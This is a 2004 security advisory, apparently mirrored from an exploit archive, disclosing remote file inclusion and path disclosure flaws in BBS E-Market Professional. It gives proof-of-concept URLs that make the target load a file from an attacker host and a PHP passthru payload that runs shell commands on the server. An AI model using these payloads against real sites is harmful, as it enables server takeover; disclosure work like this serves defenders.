
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
138 lines
4.4 KiB
Text
Executable file
138 lines
4.4 KiB
Text
Executable file
____________________ ___ ___ ________
|
|
\_ _____/\_ ___ \ / | \\_____ \
|
|
| __)_ / \ \// ~ \/ | \
|
|
| \\ \___\ Y / | \
|
|
/_______ / \______ /\___|_ /\_______ /
|
|
\/ \/ \/ \/
|
|
|
|
.OR.ID
|
|
ECHO_ADV_06$2004
|
|
|
|
---------------------------------------------------------------------------
|
|
Multiple vulnerabilities 1n BBS E-Market Professional
|
|
---------------------------------------------------------------------------
|
|
|
|
Author: y3dips
|
|
Date: Sept, 7th 2004
|
|
Location: Indonesian, Jakarta
|
|
Web: http://echo.or.id/adv/adv06-y3dips-2004.txt
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
E-market is commercial software made by korean company, includes shopping mall,
|
|
community , e-crm (e-customer relationship management) , group buying ,weblog,
|
|
auction, estimate sheet , and other features
|
|
|
|
web : http://www.nt.co.kr
|
|
http://www.bbs2000.co.kr
|
|
|
|
Risk: very high ( ***** )
|
|
most off all korean sites that handle e-shop , e-banking,... use this
|
|
d**n software
|
|
|
|
else, no more info could get cause the site in korean language :(
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
Vulnerabilities:
|
|
~~~~~~~~~~~~~~~~
|
|
|
|
1. Remote Command Execution
|
|
|
|
Remote command execution on 'becommunity' (modules that support by BBS e-market
|
|
professional) makes insecure calls to the include() function of PHP (works
|
|
on " pageurl= " functions ) which can allow the inclusion of remote files,
|
|
and thereby the execution of arbitrary commands by remote user with the web
|
|
server user permissions, usually 'nobody' .
|
|
|
|
|
|
http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]
|
|
http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]
|
|
|
|
POC=
|
|
|
|
http://[TARGET]/becommunity/community/index.php?pageurl=http://[ATTACKER]/echo.txt?
|
|
http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=http://[ATTACKER]/echo.txt?
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Exploit :
|
|
~~~~~~~~~
|
|
|
|
-------------------------------- cut -------------------------------------
|
|
|
|
<?
|
|
echo "".passthru(' ls -la ; id ')."";
|
|
?>
|
|
|
|
|
|
---------------------------------- cut ------------------------------------
|
|
|
|
save on attacker URL with name: echo.txt , to get a listing of file or directories ,
|
|
with user id that we got
|
|
|
|
--------------------------------------------------------------------------
|
|
|
|
2. Full Path disclosure
|
|
|
|
A remote user can access the file to cause the system to display an error
|
|
message that indicates the installation path. The resulting error message
|
|
will disclose potentially sensitive installation path information to the
|
|
remote attacker.
|
|
|
|
http://[TARGET]/becommunity/community/index.php?from_market=[char]
|
|
|
|
POC =
|
|
|
|
http://[TARGET]/becommunity/community/index.php?from_market=dudul
|
|
|
|
|
|
Warning: main(main.php) [function.main]: failed to create stream: No such file
|
|
or directory in /home5/standard_r5/[TARGET]/html/becommunity/community/index.php on line 239
|
|
|
|
Warning: main() [function.main]: Failed opening 'main.php' for inclusion
|
|
(include_path='.:/usr/local/php/lib/php')
|
|
in /home5/standard_r5/[TARGET]/html/becommunity/community/index.php on line 239
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
The fix:
|
|
~~~~~
|
|
No Access to the code,- so buh bye :)
|
|
Vendor allready contacted but no response till now
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Disclamier:
|
|
~~~~~~~
|
|
|
|
Advice, directions, instructions and script on security vulnerabilities
|
|
in this advisory for educational purpose, y3dips nor echo.or.id does not
|
|
accept responsibility for any damage or injury caused as a result of its use
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Shoutz:
|
|
~~~~~
|
|
|
|
~ K-159, m0by, the_day, comex, z3r0byt3, c-a-s-e, S`to @T echo/staff
|
|
~ Biatch-x, yudhax, lieur-euy || newbie_hacker@yahoogroups.com
|
|
~ #e-c-h-o & #aikmel @DALNET
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Contact:
|
|
~~~~~~~~
|
|
|
|
y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id
|
|
Homepage: http://y3dips.echo.or.id/
|
|
|
|
-------------------------------- [ EOF ] ----------------------------------
|
|
|
|
# milw0rm.com [2006-12-02]
|